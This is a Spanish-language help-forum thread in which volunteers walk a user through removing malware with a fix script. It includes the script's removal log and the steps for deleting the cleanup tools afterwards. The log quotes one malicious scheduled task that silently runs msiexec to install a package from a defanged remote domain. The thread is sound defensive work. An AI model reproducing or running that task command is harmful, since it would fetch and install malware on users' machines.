2019-02-20 22:26 - 2019-02-25 20:19 - 000000000 ____D C:\Windows\SysWOW64\qhpduwip
2019-02-20 22:26 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\5fgtl00uoz1
2019-02-20 22:20 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ex5jjx0e11b
2019-02-20 22:07 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\xazbrsguaeb
2019-02-20 22:03 - 2019-02-20 22:03 - 000003578 _____ C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150}
2019-02-20 22:03 - 2019-02-20 22:03 - 000003472 _____ C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{B3627947-F7BF-ABF0-C7EA-7327C70D2A76}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{1CDD8693-086B-044F-1315-CC8813F295D9}
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1028
2019-02-25 23:03 - 2019-02-28 20:43 - 000000000 ____D () C:\Users\Michael\AppData\Local\Temp\ImagingEngine.dll
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
Task: {36862642-B4E0-4EE1-8C8A-BAB564791EF6} - System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150} => "msiexec" -q -i hxxps://refreshnerer711.info/mp2FA19Hb.GWj <==== ATTENTION
Task: {5D11E411-A841-43AC-AF9A-BFF0D70F52BB} - System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863} => C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe
C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe

CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
RemoveProxy:
EmptyTemp:
Hosts:
END
*****************

Processes closed successfully.
Error: (0) Failed to create a restore point.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
C:\Users\Michael\AppData\Roaming\mwp5plgzgye => moved successfully
C:\Users\Michael\AppData\Roaming\ytvjbkdd0kq => moved successfully
C:\Windows\SysWOW64\qhpduwip => moved successfully
C:\Users\Michael\AppData\Roaming\5fgtl00uoz1 => moved successfully
C:\Users\Michael\AppData\Roaming\ex5jjx0e11b => moved successfully
C:\Users\Michael\AppData\Roaming\xazbrsguaeb => moved successfully
C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150} => moved successfully
C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863} => moved successfully
C:\ProgramData\{B3627947-F7BF-ABF0-C7EA-7327C70D2A76} => moved successfully
C:\ProgramData\{1CDD8693-086B-044F-1315-CC8813F295D9} => moved successfully
C:\Windows\SysWOW64\3082 => moved successfully
C:\Windows\SysWOW64\2052 => moved successfully
C:\Windows\SysWOW64\1055 => moved successfully
C:\Windows\SysWOW64\1049 => moved successfully
C:\Windows\SysWOW64\1046 => moved successfully
C:\Windows\SysWOW64\1045 => moved successfully
C:\Windows\SysWOW64\1042 => moved successfully
C:\Windows\SysWOW64\1041 => moved successfully
C:\Windows\SysWOW64\1040 => moved successfully
C:\Windows\SysWOW64\1036 => moved successfully
C:\Windows\SysWOW64\1033 => moved successfully
C:\Windows\SysWOW64\1031 => moved successfully
C:\Windows\SysWOW64\1029 => moved successfully
C:\Windows\SysWOW64\1028 => moved successfully
C:\Windows\system32\3082 => moved successfully
C:\Windows\system32\2052 => moved successfully
C:\Windows\system32\1055 => moved successfully
C:\Windows\system32\1049 => moved successfully
C:\Windows\system32\1046 => moved successfully
C:\Windows\system32\1045 => moved successfully
C:\Windows\system32\1042 => moved successfully
C:\Windows\system32\1041 => moved successfully
C:\Windows\system32\1040 => moved successfully
C:\Windows\system32\1036 => moved successfully
C:\Windows\system32\1033 => moved successfully
C:\Windows\system32\1031 => moved successfully
C:\Windows\system32\1029 => moved successfully
C:\Windows\system32\1028 => moved successfully
C:\Users\Michael\AppData\Local\Temp\ImagingEngine.dll => moved successfully
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{36862642-B4E0-4EE1-8C8A-BAB564791EF6}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{36862642-B4E0-4EE1-8C8A-BAB564791EF6}" => removed successfully
"C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{5FD437EB-B8FD-6770-A341-781CF526B150}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5D11E411-A841-43AC-AF9A-BFF0D70F52BB}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5D11E411-A841-43AC-AF9A-BFF0D70F52BB}" => removed successfully
"C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{5ECEA90F-9A09-5605-7F57-64045EF8E863}" => removed successfully
"C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe" => not found

========= ipconfig /flushdns =========


Configuraci¢n IP de Windows

Se vaci¢ correctamente la cach‚ de resoluci¢n de DNS.

========= End of CMD: =========


========= ipconfig /renew =========


Configuraci¢n IP de Windows


Adaptador de Ethernet Conexi¢n de  rea local:

   Sufijo DNS espec¡fico para la conexi¢n. . : Home
   V¡nculo: direcci¢n IPv6 local. . . : fe80::6c2a:7ecf:3cd2:d189%14
   Direcci¢n IPv4. . . . . . . . . . . . . . : 192.168.1.41
   M scara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : 192.168.1.1

Adaptador de t£nel isatap.Home:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS espec¡fico para la conexi¢n. . : Home

========= End of CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= End of CMD: =========


========= netsh winsock reset =========


El cat logo Winsock se restableci¢ correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= End of CMD: =========


========= netsh advfirewall set allprofiles state ON =========

Aceptar


========= End of CMD: =========


========= netsh int ipv4 reset =========

Global se restableci¢ correctamente.
Interfaz se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= End of CMD: =========


========= netsh int ipv6 reset =========

No hay valores configurados por el usuario para restablecer.


========= End of CMD: =========


========= RemoveProxy: =========

"HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
"HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully


========= End of RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 12582912 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 5911008 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 2662361 B
Edge => 0 B
Chrome => 385884317 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 83597 B
systemprofile32 => 66228 B
LocalService => 66228 B
NetworkService => 2014 B
Michael => 2782046 B

RecycleBin => 0 B
EmptyTemp: => 391 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 15:40:03 ====

Por cierto, donde se ha guardado esa copia del registro que hice con el Delfix? se que es importante que siempre tenga una copia de respaldo que funcione por futuros problemas que pueda tener el pc pero es solo curiosidad. Gracias :slight_smile:

#11

Hola:

Te dejo el Manual:

La ubicación seria:

C:/windows/erunt/Delfix.

Comenta como sientes el equipo, pruebalo, reinicia un par de veces, y nos comentas si todo ya esta en orden.

Salu2.

#12

hola, muchichichichichisimas gracias! :smiley: el pc esta todo bien ya no esta enfermita :slight_smile: ya no da ningun problema

1 me gusta
#13

Hola:

Para eliminar las herramientas utilizadas:

Descargas >> Delfix, a tu escritorio.

  • Doble clic para ejecutarlo.(Si usas Windows Vista/7 /8 /10,presiona clic derecho y selecciona >> “Ejecutar como Administrador”)
  • Marca las casilla Remove disinfection tools y Purgue Sistem Restore
  • Pulsar en Run.

Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.

Que bueno que hayamos podido resolver tu consulta…:+1:

Para otros problemas, ya sabes donde encontrarnos. :wink:

Tema Solucionado

Salu2.

cerrado #14